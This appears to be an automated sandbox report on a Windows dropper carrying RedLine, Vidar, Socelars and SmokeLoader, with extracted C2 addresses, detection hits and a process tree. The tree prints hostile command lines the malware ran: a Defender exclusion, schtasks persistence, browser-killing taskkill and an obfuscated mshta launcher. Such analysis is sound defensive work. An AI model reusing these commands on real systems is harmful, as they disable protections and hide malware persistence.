redline | 400debff42246bcf28d1eba937480ebdfa755c932707db10ab58ec4a1f5e94f1

Resubmissions

10/11/2021, 14:52

211110-r84p8aedej 10

09/11/2021, 13:19

211109-qkrv3sfcg4 10

Analysis

max time kernel
81s
max time network
360s
platform
windows10_x64
resource
win10-en-20211104
submitted
10/11/2021, 14:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

82bf2273f62e1bb50f3189fcf8bcf367a264e6942848209c325b3dd5da2cd62f.exe
Size

6.0MB
MD5

d4074889823e1903a7cad0b5fec73ec2
SHA1

b143adc240983728c546d24af9f15e987e181883
SHA256

82bf2273f62e1bb50f3189fcf8bcf367a264e6942848209c325b3dd5da2cd62f
SHA512

3af61a360e747ef3751e7108c3b54ead237da4b267af34c798986891adfceb7d0c41cde9ce8f73dd8666c0f39037a62ae9b3044c237777b5170c5abb24725ee5

Score

10^/10

redline smokeloader socelars vidar 916 937 ani media17 aspackv2 backdoor evasion infostealer spyware stealer suricata trojan

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

redline

Botnet

media17

91.121.67.60:2151

Extracted

Family

vidar

Version

41.4

Botnet

916

https://mas.to/@sslam

Attributes

profile_id
916

Extracted

Family

redline

Botnet

ANI

194.104.136.5:46013

Extracted

Family

smokeloader

Version

2020

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32

Extracted

Family

vidar

Version

48.1

Botnet

937

Attributes

profile_id
937

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5004	4836	rundll32.exe	121
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5068	4836	rundll32.exe	121
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7064	4836	rundll32.exe	121

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

resource	yara_rule
behavioral27/memory/4316-263-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral27/memory/4316-265-0x000000000041B246-mapping.dmp	family_redline
behavioral27/memory/4328-266-0x000000000041B23A-mapping.dmp	family_redline
behavioral27/memory/4328-264-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral27/files/0x000400000001ac13-186.dat	family_socelars
behavioral27/files/0x000400000001ac13-221.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata

Vidar Stealer 4 IoCs

stealer

resource	yara_rule
behavioral27/memory/1480-286-0x0000000002470000-0x0000000002546000-memory.dmp	family_vidar
behavioral27/memory/1480-288-0x0000000000400000-0x00000000007F3000-memory.dmp	family_vidar
behavioral27/memory/1044-647-0x0000000002280000-0x0000000002355000-memory.dmp	family_vidar
behavioral27/memory/1044-648-0x0000000000400000-0x00000000004D8000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral27/files/0x000500000001abc3-122.dat	aspack_v212_v242
behavioral27/files/0x000500000001abc3-125.dat	aspack_v212_v242
behavioral27/files/0x000500000001abc1-131.dat	aspack_v212_v242
behavioral27/files/0x000500000001abc1-130.dat	aspack_v212_v242
behavioral27/files/0x000400000001ac09-129.dat	aspack_v212_v242
behavioral27/files/0x000400000001ac09-128.dat	aspack_v212_v242
behavioral27/files/0x000500000001abc1-123.dat	aspack_v212_v242

Blocklisted process makes network request 1 IoCs

flow	pid	Process
23	1376	schtasks.exe

Downloads MZ/PE file

Executes dropped EXE 23 IoCs

pid	Process
3628	setup_install.exe
1656	Sun2128d61f9358.exe
4048	Sun21c33ae3a191b.exe
2312	Sun212736ec63.exe
1300	Sun213c49cc3bd4.exe
3996	Sun215c5b20adc.exe
1288	Sun21f9c71d42918f28e.exe
2020	Sun212ea10827dd957ed.exe
2328	Sun21aaeaf2b3.exe
1480	Sun21be7f43b93f9f.exe
2728	Sun211ab21beada98.exe
1912	Sun21e06791ee23a2835.exe
3256	WerFault.exe
4012	Sun218b1053ccd0cc0b8.exe
1376	Sun21ecde0db2e3e.exe
1220	Sun21f3c6e77768d.exe
4160	Sun21f3c6e77768d.tmp
4288	Sun21f3c6e77768d.exe
4396	Sun21f3c6e77768d.tmp
4316	Sun211ab21beada98.exe
4328	Sun2128fb23843662d1.exe
4904	tnBq0LI3qUF5CnecKFbgSBYu.exe
4940	WerFault.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Loads dropped DLL 9 IoCs

pid	Process
3628	setup_install.exe
3628	setup_install.exe
3628	setup_install.exe
3628	setup_install.exe
3628	setup_install.exe
3628	setup_install.exe
4160	Sun21f3c6e77768d.tmp
4396	Sun21f3c6e77768d.tmp
5044	rLmtR6ElnCg15BaYpMpiIYn1.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 16 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com
160	ipinfo.io
361	ipinfo.io
575	ipinfo.io
360	ipinfo.io
53	ipinfo.io
54	ipinfo.io
104	api.db-ip.com
285	ipinfo.io
576	ipinfo.io
577	ipinfo.io
100	ipinfo.io
103	api.db-ip.com
258	api.db-ip.com
286	ipinfo.io
359	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2728 set thread context of 4316	2728	Sun211ab21beada98.exe	112
PID 3256 set thread context of 4328	3256	WerFault.exe	113

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 19 IoCs

pid	pid_target	Process	procid_target
1688	3628	WerFault.exe	69
4708	1656	WerFault.exe	75
4844	1656	WerFault.exe	75
4168	1656	WerFault.exe	75
4420	1656	WerFault.exe	75
2268	1656	WerFault.exe	75
3592	1480	WerFault.exe	88
2176	1656	WerFault.exe	75
1044	1656	WerFault.exe	75
3804	1656	WerFault.exe	75
3256	1656	WerFault.exe	75
4624	3172	WerFault.exe	165
4476	3172	WerFault.exe	165
4572	3172	WerFault.exe	165
4832	3172	WerFault.exe	165
592	3172	WerFault.exe	165
4456	3172	WerFault.exe	165
4940	3172	WerFault.exe	165
4640	1044	WerFault.exe	164

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun21e06791ee23a2835.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun21e06791ee23a2835.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun21e06791ee23a2835.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1376	schtasks.exe
1636	schtasks.exe
952	schtasks.exe
6080	schtasks.exe
4764	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6084	timeout.exe

Kills process with taskkill 9 IoCs

evasion

pid	Process
4468	taskkill.exe
1456	taskkill.exe
5412	taskkill.exe
4520	taskkill.exe
5292	taskkill.exe
5024	taskkill.exe
6100	taskkill.exe
2164	taskkill.exe
4852	taskkill.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1948	powershell.exe
1948	powershell.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1688	WerFault.exe
1948	cmd.exe
1688	WerFault.exe
1688	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
4708	WerFault.exe
1912	Sun21e06791ee23a2835.exe
1912	Sun21e06791ee23a2835.exe
1948	cmd.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe
4844	WerFault.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

description	pid	Process
Token: SeDebugPrivilege	2312	Sun212736ec63.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeCreateTokenPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeAssignPrimaryTokenPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeLockMemoryPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeIncreaseQuotaPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeMachineAccountPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeTcbPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeSecurityPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeTakeOwnershipPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeLoadDriverPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeSystemProfilePrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeSystemtimePrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeProfSingleProcessPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeIncBasePriorityPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeCreatePagefilePrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeCreatePermanentPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeBackupPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeRestorePrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeShutdownPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeDebugPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeAuditPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeSystemEnvironmentPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeChangeNotifyPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeRemoteShutdownPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeUndockPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeSyncAgentPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeEnableDelegationPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeManageVolumePrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeImpersonatePrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: SeCreateGlobalPrivilege	4012	Sun218b1053ccd0cc0b8.exe
Token: 31	4012	Sun218b1053ccd0cc0b8.exe
Token: 32	4012	Sun218b1053ccd0cc0b8.exe
Token: 33	4012	Sun218b1053ccd0cc0b8.exe
Token: 34	4012	Sun218b1053ccd0cc0b8.exe
Token: 35	4012	Sun218b1053ccd0cc0b8.exe
Token: SeDebugPrivilege	2328	Sun21aaeaf2b3.exe
Token: SeRestorePrivilege	1688	WerFault.exe
Token: SeBackupPrivilege	1688	WerFault.exe
Token: SeDebugPrivilege	1688	WerFault.exe
Token: SeDebugPrivilege	4708	WerFault.exe
Token: SeDebugPrivilege	4844	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1388 wrote to memory of 3628	1388	82bf2273f62e1bb50f3189fcf8bcf367a264e6942848209c325b3dd5da2cd62f.exe	69
PID 1388 wrote to memory of 3628	1388	82bf2273f62e1bb50f3189fcf8bcf367a264e6942848209c325b3dd5da2cd62f.exe	69
PID 1388 wrote to memory of 3628	1388	82bf2273f62e1bb50f3189fcf8bcf367a264e6942848209c325b3dd5da2cd62f.exe	69
PID 3628 wrote to memory of 1172	3628	setup_install.exe	72
PID 3628 wrote to memory of 1172	3628	setup_install.exe	72
PID 3628 wrote to memory of 1172	3628	setup_install.exe	72
PID 3628 wrote to memory of 716	3628	setup_install.exe	73
PID 3628 wrote to memory of 716	3628	setup_install.exe	73
PID 3628 wrote to memory of 716	3628	setup_install.exe	73
PID 3628 wrote to memory of 1324	3628	setup_install.exe	74
PID 3628 wrote to memory of 1324	3628	setup_install.exe	74
PID 3628 wrote to memory of 1324	3628	setup_install.exe	74
PID 3628 wrote to memory of 2472	3628	setup_install.exe	110
PID 3628 wrote to memory of 2472	3628	setup_install.exe	110
PID 3628 wrote to memory of 2472	3628	setup_install.exe	110
PID 1172 wrote to memory of 1948	1172	cmd.exe	109
PID 1172 wrote to memory of 1948	1172	cmd.exe	109
PID 1172 wrote to memory of 1948	1172	cmd.exe	109
PID 3628 wrote to memory of 1516	3628	setup_install.exe	108
PID 3628 wrote to memory of 1516	3628	setup_install.exe	108
PID 3628 wrote to memory of 1516	3628	setup_install.exe	108
PID 3628 wrote to memory of 2808	3628	setup_install.exe	107
PID 3628 wrote to memory of 2808	3628	setup_install.exe	107
PID 3628 wrote to memory of 2808	3628	setup_install.exe	107
PID 3628 wrote to memory of 8	3628	setup_install.exe	105
PID 3628 wrote to memory of 8	3628	setup_install.exe	105
PID 3628 wrote to memory of 8	3628	setup_install.exe	105
PID 716 wrote to memory of 1656	716	cmd.exe	75
PID 716 wrote to memory of 1656	716	cmd.exe	75
PID 716 wrote to memory of 1656	716	cmd.exe	75
PID 3628 wrote to memory of 1340	3628	setup_install.exe	76
PID 3628 wrote to memory of 1340	3628	setup_install.exe	76
PID 3628 wrote to memory of 1340	3628	setup_install.exe	76
PID 3628 wrote to memory of 976	3628	setup_install.exe	104
PID 3628 wrote to memory of 976	3628	setup_install.exe	104
PID 3628 wrote to memory of 976	3628	setup_install.exe	104
PID 1324 wrote to memory of 4048	1324	cmd.exe	102
PID 1324 wrote to memory of 4048	1324	cmd.exe	102
PID 1324 wrote to memory of 4048	1324	cmd.exe	102
PID 3628 wrote to memory of 1452	3628	setup_install.exe	101
PID 3628 wrote to memory of 1452	3628	setup_install.exe	101
PID 3628 wrote to memory of 1452	3628	setup_install.exe	101
PID 2472 wrote to memory of 2312	2472	cmd.exe	78
PID 2472 wrote to memory of 2312	2472	cmd.exe	78
PID 2808 wrote to memory of 1300	2808	cmd.exe	103
PID 2808 wrote to memory of 1300	2808	cmd.exe	103
PID 2808 wrote to memory of 1300	2808	cmd.exe	103
PID 3628 wrote to memory of 1864	3628	setup_install.exe	87
PID 3628 wrote to memory of 1864	3628	setup_install.exe	87
PID 3628 wrote to memory of 1864	3628	setup_install.exe	87
PID 1516 wrote to memory of 3996	1516	cmd.exe	79
PID 1516 wrote to memory of 3996	1516	cmd.exe	79
PID 1516 wrote to memory of 3996	1516	cmd.exe	79
PID 3628 wrote to memory of 1976	3628	setup_install.exe	86
PID 3628 wrote to memory of 1976	3628	setup_install.exe	86
PID 3628 wrote to memory of 1976	3628	setup_install.exe	86
PID 3628 wrote to memory of 3912	3628	setup_install.exe	85
PID 3628 wrote to memory of 3912	3628	setup_install.exe	85
PID 3628 wrote to memory of 3912	3628	setup_install.exe	85
PID 3628 wrote to memory of 2944	3628	setup_install.exe	80
PID 3628 wrote to memory of 2944	3628	setup_install.exe	80
PID 3628 wrote to memory of 2944	3628	setup_install.exe	80
PID 3628 wrote to memory of 3276	3628	setup_install.exe	84
PID 3628 wrote to memory of 3276	3628	setup_install.exe	84

C:\Users\Admin\AppData\Local\Temp\82bf2273f62e1bb50f3189fcf8bcf367a264e6942848209c325b3dd5da2cd62f.exe
"C:\Users\Admin\AppData\Local\Temp\82bf2273f62e1bb50f3189fcf8bcf367a264e6942848209c325b3dd5da2cd62f.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1388
- C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1172
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun2128d61f9358.exe /mixone
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:716
  - - C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun2128d61f9358.exe
      Sun2128d61f9358.exe /mixone
      4⤵
      Executes dropped EXE
      PID:1656
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 660
        5⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4708
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 676
        5⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4844
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 712
        5⤵
        Program crash
        
        PID:4168
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 812
        5⤵
        Program crash
        
        PID:4420
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 836
        5⤵
        Program crash
        
        PID:2268
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 932
        5⤵
        Program crash
        
        PID:2176
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 1112
        5⤵
        Program crash
        
        PID:1044
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 1300
        5⤵
        Program crash
        
        PID:3804
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 1312
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Program crash
        
        PID:3256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun21c33ae3a191b.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1324
  - - C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun21c33ae3a191b.exe
      Sun21c33ae3a191b.exe
      4⤵
      Executes dropped EXE
      PID:4048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun21f9c71d42918f28e.exe
    3⤵
    PID:1340
  - - C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun21f9c71d42918f28e.exe
      Sun21f9c71d42918f28e.exe
      4⤵
      Executes dropped EXE
      PID:1288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun218b1053ccd0cc0b8.exe
    3⤵
    PID:2944
  - - C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun218b1053ccd0cc0b8.exe
      Sun218b1053ccd0cc0b8.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4012
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:4112
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:1456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun21f3c6e77768d.exe
    3⤵
    PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun21f3c6e77768d.exe
      Sun21f3c6e77768d.exe
      4⤵
      Executes dropped EXE
      PID:1220
    - - C:\Users\Admin\AppData\Local\Temp\is-46026.tmp\Sun21f3c6e77768d.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-46026.tmp\Sun21f3c6e77768d.tmp" /SL5="$10210,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun21f3c6e77768d.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4160
      - C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun21f3c6e77768d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun21f3c6e77768d.exe" /SILENT
        6⤵
        Executes dropped EXE
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\is-LRSNF.tmp\Sun21f3c6e77768d.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LRSNF.tmp\Sun21f3c6e77768d.tmp" /SL5="$20210,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun21f3c6e77768d.exe" /SILENT
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun21ecde0db2e3e.exe
    3⤵
    PID:3276
  - - C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun21ecde0db2e3e.exe
      Sun21ecde0db2e3e.exe
      4⤵
      Executes dropped EXE
      PID:1376
    - - C:\Users\Admin\Pictures\Adobe Films\qL5zJXruev1ygvVD6MR2NjoW.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\qL5zJXruev1ygvVD6MR2NjoW.exe"
        5⤵
        
        PID:4532
    - - C:\Users\Admin\Pictures\Adobe Films\QOT0eYqyz2k18wRHDqjIiHhd.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\QOT0eYqyz2k18wRHDqjIiHhd.exe"
        5⤵
        
        PID:1044
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 916
        6⤵
        Program crash
        
        PID:4640
    - - C:\Users\Admin\Pictures\Adobe Films\xmxdlrKxsLgYATI5hBlWVTLP.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\xmxdlrKxsLgYATI5hBlWVTLP.exe"
        5⤵
        
        PID:3172
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 664
        6⤵
        Program crash
        
        PID:4624
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 676
        6⤵
        Program crash
        
        PID:4476
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 776
        6⤵
        Program crash
        
        PID:4572
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 812
        6⤵
        Program crash
        
        PID:4832
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 1168
        6⤵
        Program crash
        
        PID:592
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 1128
        6⤵
        Program crash
        
        PID:4456
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 1120
        6⤵
        Executes dropped EXE
        Program crash
        
        PID:4940
    - - C:\Users\Admin\Pictures\Adobe Films\rLmtR6ElnCg15BaYpMpiIYn1.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\rLmtR6ElnCg15BaYpMpiIYn1.exe"
        5⤵
        Loads dropped DLL
        
        PID:5044
      - C:\Users\Admin\Pictures\Adobe Films\rLmtR6ElnCg15BaYpMpiIYn1.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\rLmtR6ElnCg15BaYpMpiIYn1.exe"
        6⤵
        
        PID:5296
    - - C:\Users\Admin\Pictures\Adobe Films\Q5Naw44VRSocs5ukO114RNfd.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Q5Naw44VRSocs5ukO114RNfd.exe"
        5⤵
        
        PID:3804
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:1636
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:952
      - C:\Users\Admin\Documents\9DZMniKXxThalqPsqzyfjYvh.exe
        
        "C:\Users\Admin\Documents\9DZMniKXxThalqPsqzyfjYvh.exe"
        6⤵
        
        PID:4828
        
        C:\Users\Admin\Pictures\Adobe Films\ow4sxbVQ5jl5s9shh2TN81yt.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ow4sxbVQ5jl5s9shh2TN81yt.exe"
        7⤵
        
        PID:6520
        
        C:\Users\Admin\Pictures\Adobe Films\T0peTsGDAAGb9_YVZDiuL6Ny.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\T0peTsGDAAGb9_YVZDiuL6Ny.exe"
        7⤵
        
        PID:7108
        
        C:\Users\Admin\Pictures\Adobe Films\VBWofflvOXZNJVRhEIH5YOKZ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\VBWofflvOXZNJVRhEIH5YOKZ.exe"
        7⤵
        
        PID:7100
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        
        PID:6928
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:4520
        
        C:\Users\Admin\Pictures\Adobe Films\ABIjzhNPROCOqdMsNLC01uxI.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ABIjzhNPROCOqdMsNLC01uxI.exe"
        7⤵
        
        PID:7092
        
        C:\Users\Admin\Pictures\Adobe Films\N3yUcmwBWiSPHmjJ7NrmpgSk.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\N3yUcmwBWiSPHmjJ7NrmpgSk.exe"
        7⤵
        
        PID:6244
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\N3yUcmwBWiSPHmjJ7NrmpgSk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\N3yUcmwBWiSPHmjJ7NrmpgSk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        8⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\cmd.exe
        
